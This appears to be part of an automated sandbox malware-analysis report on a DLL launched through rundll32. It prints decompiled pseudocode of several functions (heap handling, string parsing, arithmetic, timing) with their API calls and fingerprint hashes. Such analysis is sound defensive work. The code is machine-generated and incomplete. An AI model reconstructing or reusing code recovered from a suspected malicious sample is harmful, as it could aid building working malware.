				signed short _v56;
				void* __rsi;
				void* _t20;
				void* _t24;
				short _t30;
				signed short _t32;
				long long _t44;
				long _t56;
				long _t59;
				void* _t60;
				long long _t63;
				void* _t65;
				void* _t75;
				void* _t76;

				_t45 = __rbx;
				_t75 = _t65;
				 *((long long*)(_t75 + 8)) = __rbx;
				 *((long long*)(_t75 + 0x10)) = __rbp;
				_t44 =  *0x8000d4a0;
				_t60 = __r8;
				_t63 = __rdx;
				_t20 = E00000001180001000(__rbx, _t75 - 0x20, __rdx, _t75 + 0x20);
				r12d = 0;
				if (_t20 != r12d) goto 0x8000376a;
				_t30 = _a32;
				_v38 = _t30;
				_v40 = _t30;
				_t32 = _t30 + 1 + _t30 + 1;
				_v54 = _t32;
				r8d = _t32 & 0x0000ffff;
				HeapAlloc(_t76, _t56, _t59);
				_v48 = _t44;
				if (_t44 == _t76) goto 0x8000375a;
				r8d = 0;
				_v56 = r12w;
				if (RtlOemStringToUnicodeString(??, ??, ??) - r12d >= 0) goto 0x80003731;
				RtlNtStatusToDosError(??);
				goto 0x80003748;
				_t24 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t45, _v48, _t60, _t63, _t63, _t60);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return _t24;
			}

APIs

Part of subcall function 0000000180001000: CreateFileW.KERNEL32 ref: 000000018000104A
Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0

HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
RtlNtStatusToDosError.NTDLL ref: 0000000180003729
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
String ID:
API String ID: 45859668-0
Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800033B4 Relevance: 6.4, APIs: 5, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000000011800033B4(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
				void* __rdi;
				intOrPtr _t65;
				intOrPtr _t87;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t105;
				signed long long _t107;
				void* _t112;
				void* _t120;
				signed long long _t123;
				signed long long _t130;
				intOrPtr* _t131;
				intOrPtr _t139;
				void* _t154;
				intOrPtr _t155;
				void* _t157;
				signed long long _t159;
				intOrPtr* _t160;
				void* _t163;
				void* _t165;
				void* _t166;
				intOrPtr* _t171;
				void* _t179;
				signed long long _t181;
				signed long long _t182;
				int _t185;
				int _t187;
				void* _t191;

				 *((long long*)(_t165 + 0x18)) = __rbx;
				 *((long long*)(_t165 + 0x10)) = __rdx;
				 *((long long*)(_t165 + 8)) = __rcx;
				_t166 = _t165 - 0x660;
				_t155 =  *((intOrPtr*)(_t166 + 0x6c0));
				r13d = r9d;
				r9d =  *((intOrPtr*)(_t166 + 0x6c8));
				r9d = r9d - 1;
				_t123 = r9d - 1;
				if (__eflags < 0) goto 0x80003400;
				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x800033f1;
				_t105 = __r9 + 1;
				 *((intOrPtr*)(_t166 + 0x28)) = _t105;
				if (_t105 == 0) goto 0x80003641;
				_t13 = _t123 + 0x20; // 0x20
				r14d = _t13;
				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x8000342d;
				_t112 = 0 - r14d;
				if (_t112 >= 0) goto 0x8000342d;
				if (_t112 != 0) goto 0x80003422;
				r14d = r14d - 1;
				r8d = _t105;
				 *((intOrPtr*)(_t166 + 0x20)) = r14d;
				memset(_t191, _t187, _t185);
				_t16 = _t166 + 0x250; // 0x249
				r9d = r13d;
				r8d = r14d;
				_t130 = _t185 << 2;
				_t65 = E00000001180008AD0(_t112, _t130, _t16, __r8, _t155, _t179);
				_t17 = _t166 + 0x40; // 0x39
				r9d = _t105;
				 *((intOrPtr*)(_t166 + _t130 + 0x250)) = _t65;
				E00000001180008AD0(_t112, _t130, _t17, _t155, _t155, _t154);
				_t100 =  *((intOrPtr*)(_t166 + 0x40 + _t159 * 4));
				 *((intOrPtr*)(_t166 + 0x24)) = _t100;
				memset(_t163, ??);
				r13d = r13d - _t105;
				_t139 = _t105;
				_t181 = r13d;
				 *(_t166 + 0x30) = _t181;
				if (_t112 < 0) goto 0x800035ee;
				_t124 = _t181 + _t139;
				_t28 = _t181 * 4; // 0x249
				_t160 = _t166 + _t28 + 0x250;
				r9d = 0xffffffff;
				_t31 = _t124 * 4; // 0x249
				_t131 = _t166 + _t31 + 0x250;
				if (_t100 != r9d) goto 0x800034d0;
				_t101 =  *_t131;
				goto 0x800034fb;
				r8d = _t155 + 1;
				_t157 =  >  ? __r9 : (_t181 + _t139 << 0x20) + _t139 + _t181;
				_t44 = _t166 + 0x40; // 0x39
				_t171 = _t160;
				r10d = _t105;
				if (_t101 == 0) goto 0x8000357a;
				r12d = 0xffffffff;
				r9d =  *_t44;
				_t87 =  *_t160;
				r10d = r10d + r12d;
				_t176 = __r9 * _t163;
				 *_t171 = _t87;
				if (_t87 - r12d <= 0) goto 0x80003548;
				goto 0x8000354a;
				 *_t171 =  *_t171 - r9d;
				if ( *_t171 - r12d - r9d <= 0) goto 0x80003565;
				goto 0x80003567;
				if (r10d != 0) goto 0x80003517;
				_t107 =  *((intOrPtr*)(_t166 + 0x28));
				_t182 =  *(_t166 + 0x30);
				 *_t131 =  *_t131 - 0 + 0 + r11d;
				if ( *_t131 != 0) goto 0x80003595;
				_t47 = _t166 + 0x40; // 0x39
				r8d = _t107;
				_t120 = E000000011800049DC(_t160, _t47, _t171 + 4);
				if (_t120 < 0) goto 0x800035ae;
				_t48 = _t166 + 0x40; // 0x39
				r9d = _t107;
				 *_t131 =  *_t131 - E00000001180004D74(_t77,  *_t171, _t131, _t160, _t160, _t48);
				goto 0x8000357c;
				 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x6a0)) + _t182 * 4)) = _t101 + 1;
				r13d = r13d - 1;
				 *(_t166 + 0x30) = _t182 - 1;
				r9d = 0xffffffff;
				if (_t120 >= 0) goto 0x800034c7;
				r14d =  *((intOrPtr*)(_t166 + 0x20));
				r8d =  *((intOrPtr*)(_t166 + 0x6c8));
				memset(??, ??, ??);
				_t57 = _t166 + 0x250; // 0x249
				r9d = _t107;
				r8d = r14d;
				E00000001180007220(_t120, _t131 - 4,  *((intOrPtr*)(_t166 + 0x6a8)), _t57, _t157, _t176, _t159);
				r8d = 0x40c;
				memset(??, ??, ??);
				r8d = 0x204;
				return memset(??, ??, ??);
			}

APIs

memset.NTDLL ref: 0000000180003446
memset.NTDLL ref: 0000000180003494
memset.NTDLL ref: 00000001800035FF
memset.NTDLL ref: 000000018000362A
memset.NTDLL ref: 000000018000363C

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007760 Relevance: 6.4, APIs: 5, Instructions: 148memoryCOMMON

Download Yara Rule

APIs

memcmp.NTDLL ref: 000000018000783B
HeapFree.KERNEL32 ref: 000000018000787A
memcmp.NTDLL ref: 00000001800078A0
memcmp.NTDLL ref: 00000001800078C6
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180006A05), ref: 0000000180007930

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memcmp$FreeHeap
String ID:
API String ID: 1680564963-0
Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001EEC Relevance: 6.4, APIs: 5, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
				void* __rsi;
				signed int _t65;
				unsigned int _t66;
				signed int _t73;
				void* _t78;
				unsigned int _t85;
				void* _t87;
				void* _t91;
				void* _t112;
				int _t116;
				long long _t122;
				void* _t125;
				void* _t126;
				int _t143;
				void* _t145;
				void* _t148;

				_t78 = __eflags;
				_t87 = _t125;
				 *((long long*)(_t87 + 0x10)) = __rbx;
				 *((long long*)(_t87 + 0x18)) = _t122;
				 *((long long*)(_t87 + 8)) = __rcx;
				_t126 = _t125 - 0x860;
				r14d =  *((intOrPtr*)(_t126 + 0x8b8));
				_t91 = __rdx;
				 *(_t126 + 0x30) = _t148 << 2;
				memcpy(_t148, _t145, _t143);
				_t9 = _t126 + 0x454; // 0x4a5
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(__rdx, _t9, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
				_t13 = _t126 + 0x658; // 0x6a9
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t13, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
				memset(_t112, _t116);
				 *((intOrPtr*)(_t126 + 0x40)) = 1;
				_t73 = __edi - 1;
				if (_t78 < 0) goto 0x80001faa;
				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
				r12d = _t73;
				if (_t73 < 0) goto 0x80002081;
				_t65 =  *(__r8 + _t73 * 4);
				if (_t73 != r12d) goto 0x80001fe8;
				if ((_t65 & 0xc0000000) != 0) goto 0x80001fe8;
				_t66 = _t65 << 2;
				if ((_t66 & 0xc0000000) == 0) goto 0x80001fd2;
				if (0x10000001e == 0) goto 0x80002075;
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
				_t85 = _t66 >> 0x1e;
				if (_t85 == 0) goto 0x80002068;
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
				if (_t85 != 0) goto 0x80001fef;
				if (_t85 >= 0) goto 0x80001fbb;
				memcpy(??, ??, ??);
				r8d = 0x60c;
				memset(??, ??, ??);
				r8d = 0x204;
				return memset(??, ??, ??);
			}

APIs

memcpy.NTDLL ref: 0000000180001F31

Part of subcall function 0000000180003934: memset.NTDLL ref: 0000000180003985

memset.NTDLL ref: 0000000180001F8A
memcpy.NTDLL ref: 0000000180002093
memset.NTDLL ref: 00000001800020A8
memset.NTDLL ref: 00000001800020BA

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006108 Relevance: 6.4, APIs: 5, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
				long long _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				intOrPtr _t40;
				void* _t56;
				void* _t57;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr* _t73;
				signed long long _t90;
				void* _t92;
				void* _t108;
				void* _t110;
				intOrPtr* _t112;

				_t72 = __rbx;
				_a16 = __rbx;
				_a8 = __rcx;
				_t69 =  *0x8000d4a0;
				_t57 = r8d;
				_v72 =  *((intOrPtr*)(_t69 + 8));
				_t8 = _t90 + 8; // 0x8
				r14d = _t8;
				HeapAlloc(??, ??, ??);
				if (_t69 == 0) goto 0x8000627d;
				if (_t57 == 0) goto 0x800061f7;
				_t112 = __rdx + 0x20;
				E00000001180006008(__rbx, __rcx, _t92, __rdx + (__rbx + __rbx * 4) * 8);
				if (_t69 == 0) goto 0x800061ec;
				r9d =  *((intOrPtr*)(_t112 - 8));
				_v88 = _t69 + (_t90 + _t90 * 2) * 8;
				_a24 = E00000001180006344(_t69, _t72, _a8, _t69, _t92,  *_t112, _t108, _t110);
				HeapFree(??, ??, ??);
				_t40 = _a24;
				if (_t40 == 0) goto 0x800061ec;
				_t56 = 0 + _t40;
				if (1 - _t57 < 0) goto 0x80006176;
				r14d = 8;
				if (1 != _t57) goto 0x80006225;
				_v88 = _a64;
				r14d = E00000001180007444(_t40, _t56, _t72, _t69, _a48, _a56);
				if (_t56 == 0) goto 0x8000626f;
				_t31 =  &_a8; // 0x8
				_t73 = _t31;
				if ( *_t73 == 0) goto 0x8000624b;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t73 - 8)) == 0) goto 0x80006265;
				_t67 =  *((intOrPtr*)(_t73 + 0xc));
				if (_t67 == 0) goto 0x80006265;
				HeapFree(??, ??, ??);
				if (_t67 != 0) goto 0x80006238;
				HeapFree(??, ??, ??);
				return r14d;
			}

APIs

HeapAlloc.KERNEL32 ref: 0000000180006151
HeapFree.KERNEL32 ref: 00000001800061C7
HeapFree.KERNEL32 ref: 0000000180006245
HeapFree.KERNEL32 ref: 000000018000625F
HeapFree.KERNEL32 ref: 0000000180006277

Part of subcall function 0000000180006008: lstrlenA.KERNEL32(?,?,00000000,0000000180006189), ref: 0000000180006042
Part of subcall function 0000000180006008: HeapAlloc.KERNEL32 ref: 0000000180006057
Part of subcall function 0000000180006008: _snprintf.NTDLL ref: 00000001800060B9
Part of subcall function 0000000180006008: lstrcpyA.KERNEL32 ref: 00000001800060DD

Part of subcall function 0000000180006344: Sleep.KERNEL32(00000000,00000001800061B8), ref: 000000018000638C
Part of subcall function 0000000180006344: GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180006397
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 00000001800063E6
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 00000001800063F2
Part of subcall function 0000000180006344: HeapAlloc.KERNEL32 ref: 0000000180006405
Part of subcall function 0000000180006344: lstrcpyA.KERNEL32 ref: 000000018000641D
Part of subcall function 0000000180006344: lstrcatA.KERNEL32 ref: 0000000180006444
Part of subcall function 0000000180006344: lstrcatA.KERNEL32 ref: 0000000180006450
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 0000000180006482
Part of subcall function 0000000180006344: HeapAlloc.KERNEL32 ref: 000000018000649B

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocFreelstrlen$Timelstrcatlstrcpy$FileSleepSystem_snprintf
String ID:
API String ID: 2523292596-0
Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007DBC Relevance: 6.2, APIs: 4, Instructions: 163
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00000001180007DBC(void* __edx, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
				intOrPtr _v80;
				void* _v88;
				long _v96;
				signed int _v104;
				long long _v112;
				long long _v120;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed int _t55;
				signed int _t63;
				void* _t64;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t75;
				void* _t76;
				void* _t85;
				signed long long _t107;
				struct _FILETIME* _t110;
				void* _t128;
				void* _t129;
				long _t131;
				signed int _t132;
				void* _t135;
				void* _t137;
				void* _t147;
				void* _t148;
				void* _t149;
				signed int* _t150;
				long long _t151;
				void* _t153;
				signed long long _t155;
				void* _t157;

				_t148 = _t137;
				 *((long long*)(_t148 + 0x18)) = __r8;
				 *((long long*)(_t148 + 0x10)) = __rdx;
				 *(_t148 + 0x20) =  *(_t148 + 0x20) & 0x00000000;
				r14d = 0;
				_v104 =  *0x8000d498;
				_t129 = __rcx;
				 *(_t148 - 0x58) =  *(_t148 - 0x58) & _t155;
				if (E00000001180001CB0(_t110, __rcx, _t148 - 0x60, _t135, _t148 + 8, _t157, _t155) == 0) goto 0x80007e19;
				_t11 = _t155 + 1; // 0x1
				r12d = _t11;
				_v96 = _t131;
				goto 0x80007e24;
				_t132 = _v96;
				r12d = 2;
				_t14 =  &_a32; // 0xba
				_t15 =  &_v88; // 0x42
				if (E00000001180008034(_t71, r12d, _t85, _t110, _t129, _t132, _t135, _t15, _t14, _t153, _t149) != 0) goto 0x80007fff;
				r8d = _a32;
				r13d = r8d;
				r13d = r13d - r12d;
				_t150 = _v88;
				if (_t132 == 0) goto 0x80007e7d;
				_t55 = _a8;
				_t150[0xa] = 1;
				_t150[0x12] = _t132;
				_t150[0xd] = _t55;
				_t150[0x10] = _t55;
				_t24 = _t129 + 0xb0; // 0xb0
				r9d = 0;
				 *_t150 = _v104 ^ 0x62ade362;
				_t150[3] =  *(_t129 + 0x48);
				_t150[2] =  *(_t129 + 0x4c);
				_t29 =  &_a8; // 0xa2
				_v112 = _t29;
				_t31 =  &_v104; // 0x32
				_v120 = _t31;
				_t73 = E0000000118000970C(_t54, _t110, _t24, _t150, _t132, _t15, _t14, _t148);
				HeapFree(_t128, _t131, _t135);
				if (r13d == 0) goto 0x80007eef;
				if (_t73 == 0) goto 0x80007ee4;
				if (_t73 != 0x10d2) goto 0x80007eef;
				E000000011800023B8(r13d, _t110, _t129, _t132, _t135);
				if (_t73 != 0) goto 0x80007fff;
				_t74 = _a8;
				_t151 = _v104;
				r13d =  *(_t129 + 0x4c);
				_t63 = E00000001180008C48(_t74, _t151);
				_t36 =  &_a8; // 0xa2
				r9d = 1;
				 *(_t129 + 0x48) = _t74;
				 *(_t129 + 0x4c) = _t63;
				_t64 = E000000011800099F4(_t76, _t110, _t129, _t151, _t132, _t135, _t36, _t147, _t148);
				_t75 = _t64;
				if (_t64 != 0) goto 0x80007fef;
				 *_a16 = _t151;
				 *_a24 = _a8;
				if ( *(_t129 + 0x4c) != r13d) goto 0x80007f62;
				r14d = 1;
				if ( *((intOrPtr*)(_t129 + 0x60)) == 0) goto 0x80007fb5;
				GetSystemTimeAsFileTime(_t110);
				if (r14d == 0) goto 0x80007fa2;
				_t107 =  *((intOrPtr*)(_t129 + 0x58));
				if (_v80 - _t107 <= 0) goto 0x80007fa2;
				_t47 = _t129 + 0xb0; // 0xb0
				if (E000000011800045E8(_t75, _t107, _t110, _t47, _t132, _t135) != 0) goto 0x80007fa2;
				asm("lock or dword [edi+0xdc], 0x1");
				 *((long long*)(_t129 + 0x58)) = _t107 * 0x23c34600 + _v80;
				if (_v96 == 0) goto 0x80007fdc;
				HeapFree(??, ??, ??);
				if (_t75 == 0) goto 0x80007fd4;
				if (_t75 != 0x10d2) goto 0x80007fdc;
				E00000001180008BC4(_t110, _t129, _v96);
				return _t75;
			}

APIs

Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77

HeapFree.KERNEL32 ref: 0000000180007ECD
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
HeapFree.KERNEL32 ref: 0000000180007FC2
HeapFree.KERNEL32 ref: 0000000180007FF7

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
String ID:
API String ID: 2852518528-0
Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005578 Relevance: 6.0, APIs: 4, Instructions: 37sleepmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055AF
Sleep.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055C1
CloseHandle.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055D9
HeapFree.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055E7

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CloseEventFreeHandleHeapSleep
String ID:
API String ID: 1881548302-0
Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000137C Relevance: 5.2, APIs: 4, Instructions: 233
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0000000118000137C(signed int __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
				void* __rbp;
				intOrPtr _t29;
				void* _t32;
				void* _t38;
				void* _t42;
				void* _t54;
				void* _t55;
				intOrPtr _t56;
				void* _t60;
				void* _t61;
				void* _t65;
				signed int _t73;
				void* _t105;
				void* _t113;
				intOrPtr _t126;
				long long _t130;
				char* _t133;
				intOrPtr* _t140;
				long _t143;
				long _t145;
				void* _t148;
				void* _t150;
				void* _t151;
				intOrPtr* _t155;
				char* _t162;
				void* _t164;
				void* _t171;
				long _t173;
				int _t176;
				void* _t180;
				void* _t182;

				_t164 = __r10;
				_t140 = __rdx;
				_t130 = __rcx;
				 *((long long*)(_t150 + 0x10)) = __rbx;
				 *((long long*)(_t150 + 8)) = __rcx;
				_t151 = _t150 - 0x60;
				_t126 =  *0x8000d4a0;
				r14d = r8d;
				if (r8d == 0) goto 0x8000160a;
				_t73 = __esi | 0xffffffff;
				r11d = 0;
				r10d = 0;
				_t29 =  *__rdx;
				if (_t29 == 0xd) goto 0x80001419;
				if (_t29 == 0xa) goto 0x80001419;
				if (0 != 0) goto 0x800013ef;
				if (_t29 == 0x20) goto 0x800013f1;
				if (_t29 == 9) goto 0x800013f1;
				goto 0x800013f1;
				if (_t29 != 0x3b) goto 0x800013fd;
				if (r11d != 0) goto 0x8000141d;
				r11d = 1;
				if (_t29 != 0x3d) goto 0x80001407;
				if (0 != 0) goto 0x8000141d;
				if (_t29 != 0x7c) goto 0x8000141d;
				if (r10d != 0) goto 0x8000141d;
				if (1 != 0) goto 0x8000141d;
				r10d = 1;
				goto 0x8000141d;
				if (1 != 0) goto 0x80001424;
				if (1 != 0) goto 0x800013ce;
				if (__rdx == _t143) goto 0x8000160a;
				r13d = r13d - r8d;
				r13d = r13d - 1;
				r14d = r14d + r13d;
				r13d = 1;
				if (r11d == 1) goto 0x800015fb;
				if (1 == 0) goto 0x80001459;
				r12d = 1;
				_t5 = _t140 - 1; // -1
				_t54 = _t5;
				goto 0x8000145c;
				_t173 = _t143;
				if (_t54 == 0) goto 0x80001605;
				if (r10d == 0) goto 0x800014db;
				_t6 = _t164 - 1; // -1
				_t60 = _t6;
				if (_t60 == 0) goto 0x800014db;
				_t31 =  <  ? _t60 : 0x10;
				if (0x10 == 0) goto 0x800014ab;
				r9b =  *__rdx;
				if (r9b == dil) goto 0x800014ab;
				if (r9b == 0x20) goto 0x800014ab;
				_t105 = r9b - 9;
				if (_t105 == 0) goto 0x800014ab;
				 *((intOrPtr*)(_t151 + 0x30 - __rdx + __rdx)) = r9b;
				if (_t105 != 0) goto 0x8000148c;
